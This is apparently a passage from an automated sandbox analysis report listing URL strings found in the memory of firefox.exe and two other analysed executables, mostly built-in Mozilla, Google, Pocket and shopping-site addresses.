Source: firefox.exe, 00000023.00000002.3249141559.00000132B6A73000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3237958152.00000132AA86B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=AIzaSy
Source: firefox.exe, 00000023.00000002.3249141559.00000132B6A03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3245288155.00000132B69B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://screenshots.firefox.com
Source: firefox.exe, 00000023.00000002.3258234904.00000132B9C70000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3249141559.00000132B6A73000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3261762897.00000132BA737000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.3125373422.00000132BA800000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.3126717821.00000132BAA38000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://screenshots.firefox.com/
Source: firefox.exe, 00000023.00000002.3304363170.00000132C3C48000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com
Source: firefox.exe, 00000023.00000002.3304363170.00000132C3C48000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com/
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3279683763.00000132BB544000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3249141559.00000132B6A03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3261762897.00000132BA737000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3242416997.00000132B61F0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com/downloads?client=navclient-auto-ffox&appver=118.0&pver=2.2
Source: firefox.exe, 00000023.00000002.3249141559.00000132B6A03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com/gethash?client=navclient-auto-ffox&appver=118.0&pver=2.2
Source: firefox.exe, 00000023.00000002.3249141559.00000132B6A03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3282517712.00000132BBD54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://smartblock.firefox.etp/facebook.svg
Source: firefox.exe, 00000023.00000002.3249141559.00000132B6A03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3282517712.00000132BBD54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://smartblock.firefox.etp/play.svg
Source: firefox.exe, 00000023.00000002.3303203265.00000132C2B7D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3260198511.00000132BA2D9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com
Source: firefox.exe, 00000023.00000003.3209291549.00000132C2392000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3249141559.00000132B6A73000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3298965968.00000132C2392000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3282517712.00000132BBD03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/This
Source: firefox.exe, 00000023.00000002.3304363170.00000132C3C48000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3242416997.00000132B61F0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.3227898022.00000132C23A5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3282517712.00000132BBD03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.3209291549.00000132C23A5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/spocs
Source: firefox.exe, 00000023.00000002.3302490357.00000132C2703000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/spocs#
Source: firefox.exe, 00000023.00000002.3302490357.00000132C2703000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/spocs#l
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/spocs:
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/user
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/userDISCOVERY_STREAM_CONFIG_RESET
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/userDISCOVERY_STREAM_CONFIG_RESETdiscoverystream.rec.impressionsdiscover
Source: firefox.exe, 00000023.00000002.3249141559.00000132B6A03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3282517712.00000132BBD54000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3276641087.00000132BB46A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-js
Source: firefox.exe, 00000023.00000002.3249141559.00000132B6A03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3282517712.00000132BBD54000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3276641087.00000132BB424000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3276641087.00000132BB46A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3267365896.00000132BB0E2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-pixel
Source: firefox.exe, 00000023.00000002.3249141559.00000132B6A03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-pixelcolor-mix(in
Source: firefox.exe, 00000023.00000002.3249141559.00000132B6A03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3312097959.00000132C424D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3245288155.00000132B69B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org
Source: firefox.exe, 00000023.00000002.3302490357.00000132C2703000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/118.0.1/WINNT/en-US/
Source: firefox.exe, 00000023.00000002.3299612052.00000132C2437000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3249141559.00000132B6AE2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/captive-portal
Source: firefox.exe, 00000023.00000002.3311278425.00000132C41E6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/firefox-crashes-troubleshoot-prevent-and-get-helpA
Source: firefox.exe, 00000023.00000002.3283630557.00000132BCB03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/fix-video-audio-problems-firefox-windows
Source: firefox.exe, 00000023.00000002.3265189555.00000132BACA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/fix-video-audio-problems-firefox-windowsThe
Source: firefox.exe, 00000023.00000002.3265189555.00000132BACA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/fix-video-audio-problems-firefox-windowsUse
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/refresh-firefox-reset-add-ons-and-settings
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/refresh-firefox-reset-add-ons-and-settingsgetCanApplyUpdates
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/warning-unresponsive-script#w_other-causes
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/warning-unresponsive-script#w_other-causeshandleUpdateFailure
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/website-translation
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/website-translationresource://gre/modules/PrivateBrowsingUtils.sys.mj
Source: feb3d39b6a.exe, 00000016.00000003.3211134500.000000000579B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: firefox.exe, 00000023.00000002.3311278425.00000132C41E6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
Source: firefox.exe, 00000023.00000002.3300363667.00000132C2503000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tc39.github.io/ecma262/#sec-typeof-operator
Source: firefox.exe, 00000023.00000002.3283630557.00000132BCB03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-2
Source: firefox.exe, 00000023.00000002.3283630557.00000132BCB03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-3.1
Source: firefox.exe, 00000023.00000002.3283630557.00000132BCB03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-4
Source: firefox.exe, 00000023.00000002.3283630557.00000132BCB03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tools.ietf.org/html/rfc7515#appendix-C)
Source: firefox.exe, 00000023.00000002.3249141559.00000132B6A03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://truecolors.firefox.com
Source: firefox.exe, 00000023.00000002.3249141559.00000132B6A03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://truecolors.firefox.comnetwork.proxy.backup.socksbrowser.handlers.migrationshttps://screensho
Source: firefox.exe, 00000023.00000002.3311278425.00000132C41F0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.3200954375.00000132C41FE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3304363170.00000132C3C88000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3316055038.000004E319904000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.3207024753.00000132C41F0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3292910030.00000132BDD9B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3282517712.00000132BBDB2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://twitter.com/
Source: firefox.exe, 00000023.00000002.3299612052.00000132C247C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3316055038.000004E319904000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3249141559.00000132B6AE2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://weibo.com/
Source: firefox.exe, 00000023.00000002.3300363667.00000132C2503000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://wicg.github.io/construct-stylesheets/#using-constructed-stylesheets).
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3299612052.00000132C247C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3249141559.00000132B6AE2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.aliexpress.com/
Source: firefox.exe, 00000023.00000002.3299612052.00000132C247C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.ca/
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3299612052.00000132C247C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.co.uk/
Source: firefox.exe, 00000023.00000002.3281670424.00000132BBAB4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.3200954375.00000132C41FE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3316055038.000004E319904000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.3207024753.00000132C41F0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3292910030.00000132BDD9B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3282517712.00000132BBDB2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3282517712.00000132BBD03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/
Source: firefox.exe, 00000023.00000002.3240579668.00000132B60AD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
Source: firefox.exe, 00000023.00000002.3303203265.00000132C2B7D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3258234904.00000132B9C70000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3249141559.00000132B6A73000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.3125373422.00000132BA800000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.3126717821.00000132BAA38000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.3127404594.00000132BAA8A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3249141559.00000132B6A25000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/
Source: firefox.exe, 00000023.00000002.3302865830.00000132C279C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3279683763.00000132BB544000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.3208780144.00000132C279C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/?field-keywords=&ie=UTF-8&mode=blended&tag=mozill
Source: firefox.exe, 00000023.00000002.3299612052.00000132C247C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.de/
Source: firefox.exe, 00000023.00000002.3299612052.00000132C247C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.fr/
Source: firefox.exe, 00000023.00000002.3299612052.00000132C247C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3249141559.00000132B6AE2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.avito.ru/
Source: firefox.exe, 00000023.00000002.3299612052.00000132C247C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.bbc.co.uk/
Source: firefox.exe, 00000023.00000002.3240579668.00000132B60AD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
Source: firefox.exe, 00000023.00000002.3299612052.00000132C247C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ebay.de/
Source: file.exe, 00000000.00000002.2604363979.0000000000F8E000.00000004.00000020.00020000.00000000.sdmp, feb3d39b6a.exe, 00000013.00000003.2952997493.0000000005609000.00000004.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000013.00000003.2953964028.0000000005606000.00000004.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000016.00000003.3119507696.00000000056A6000.00000004.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000016.00000003.3118840439.00000000056A9000.00000004.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000016.00000003.3119123250.00000000056A6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: firefox.exe, 00000023.00000002.3298965968.00000132C23E7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/
Source: firefox.exe, 00000023.00000002.3303203265.00000132C2B7D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.3181822524.00000132C25C5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.3172041141.00000132C26B3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/search
Source: firefox.exe, 00000023.00000002.3249141559.00000132B6A73000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.3125373422.00000132BA800000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.3126717821.00000132BAA38000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.3127404594.00000132BAA8A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/search?client=firefox&q=
Source: file.exe, 00000000.00000002.2604363979.0000000000F8E000.00000004.00000020.00020000.00000000.sdmp, feb3d39b6a.exe, 00000013.00000003.2952997493.0000000005609000.00000004.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000013.00000003.2953964028.0000000005606000.00000004.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000016.00000003.3119507696.00000000056A6000.00000004.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000016.00000003.3118840439.00000000056A9000.00000004.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000016.00000003.3119123250.00000000056A6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: firefox.exe, 00000023.00000002.3249141559.00000132B6A03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/policies/privacy/
Source: firefox.exe, 00000023.00000002.3249141559.00000132B6A03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/policies/privacy/startup
Source: firefox.exe, 00000023.00000002.3303203265.00000132C2B7D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3258234904.00000132B9C70000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3249141559.00000132B6A73000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.3125373422.00000132BA800000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.3126717821.00000132BAA38000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.3208033913.00000132C3C66000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.3127404594.00000132BAA8A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3249141559.00000132B6A25000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3282517712.00000132BBDB2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.3203625245.00000132BBDC0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3304363170.00000132C3C65000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.3202991056.00000132C3C69000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/search
Source: firefox.exe, 00000023.00000002.3304363170.00000132C3CC4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.3201091459.00000132C3CC4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/search?client=firefox-b-d&q=
Source: firefox.exe, 00000023.00000002.3299612052.00000132C247C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3316055038.000004E319904000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3249141559.00000132B6AE2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ifeng.com/
Source: firefox.exe, 00000023.00000002.3299612052.00000132C247C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3316055038.000004E319904000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3249141559.00000132B6AE2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.iqiyi.com/
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3299612052.00000132C247C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.leboncoin.fr/
Source: firefox.exe, 00000023.00000002.3304363170.00000132C3CD5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3242416997.00000132B618C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.3201091459.00000132C3CE0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3304363170.00000132C3CC0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3312097959.00000132C424D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3317501385.00003A0D98B04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3232903270.0000000CD927C000.00000004.00000010.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.3201091459.00000132C3CD5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3245288155.00000132B690A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3242416997.00000132B6103000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org
Source: file.exe, 00000000.00000002.2593553859.00000000002B4000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.2593553859.0000000000295000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/about/
Source: firefox.exe, 00000023.00000002.3311278425.00000132C41E6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.3183823867.00000132C3F10000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3270548472.00000132BB365000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/legal/terms/mozilla/
Source: file.exe, 00000000.00000002.2593553859.00000000002B4000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.2593553859.0000000000295000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/contribute/
Source: firefox.exe, 00000023.00000002.3311278425.00000132C41E6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: file.exe, 00000000.00000002.2593553859.00000000002B4000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.2593553859.0000000000295000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: file.exe, 00000000.00000003.2481142057.000000000BB74000.00000004.00000020.00020000.00000000.sdmp, feb3d39b6a.exe, 00000013.00000003.3008632527.00000000056F0000.00000004.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000016.00000003.3211134500.000000000579B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3309555985.00000132C409F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3311278425.00000132C41E6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: firefox.exe, 00000023.00000002.3311278425.00000132C41E6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/new/
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/new/resource:///modules/UrlbarResult.sys.mjsresource://gre/modules/P
Source: file.exe, 00000000.00000003.2481142057.000000000BB74000.00000004.00000020.00020000.00000000.sdmp, feb3d39b6a.exe, 00000013.00000003.3008632527.00000000056F0000.00000004.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000016.00000003.3211134500.000000000579B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3309555985.00000132C409F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3311278425.00000132C41E6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: file.exe, 00000000.00000002.2593553859.00000000002B4000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.2593553859.0000000000295000.00000040.00000001.01000000.00000003.sdmp, firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3240579668.00000132B605F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/#suggest-relevant-content
Source: firefox.exe, 00000023.00000002.3302490357.00000132C2703000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/#suggest-relevant-contentP
Source: firefox.exe, 00000023.00000002.3302490357.00000132C2703000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/V
Source: file.exe, 00000000.00000003.2481142057.000000000BB74000.00000004.00000020.00020000.00000000.sdmp, feb3d39b6a.exe, 00000013.00000003.3008632527.00000000056F0000.00000004.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000016.00000003.3211134500.000000000579B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3311278425.00000132C41E6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: file.exe, 00000000.00000002.2593553859.0000000000295000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/host.exe
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3317907853.00003F4396A13000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3289593951.00000132BD2BD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com
Source: firefox.exe, 00000023.00000002.3299612052.00000132C247C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.olx.pl/
Source: firefox.exe, 00000023.00000002.3249141559.00000132B6A03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3276641087.00000132BB475000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.openh264.org/
Source: firefox.exe, 00000023.00000002.3249141559.00000132B6A03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.openh264.org/findUpdates()
Source: firefox.exe, 00000023.00000002.3281670424.00000132BBAB4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.3200954375.00000132C41FE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3316055038.000004E319904000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.3207024753.00000132C41F0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3282517712.00000132BBDB2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.reddit.com/
Source: firefox.exe, 00000023.00000002.3317907853.00003F4396A13000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.tsn.ca
Source: firefox.exe, 00000023.00000002.3249141559.00000132B6A03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.widevine.com/
Source: firefox.exe, 00000023.00000002.3249141559.00000132B6A03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.widevine.com/get
Source: firefox.exe, 00000023.00000002.3299612052.00000132C247C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.wykop.pl/
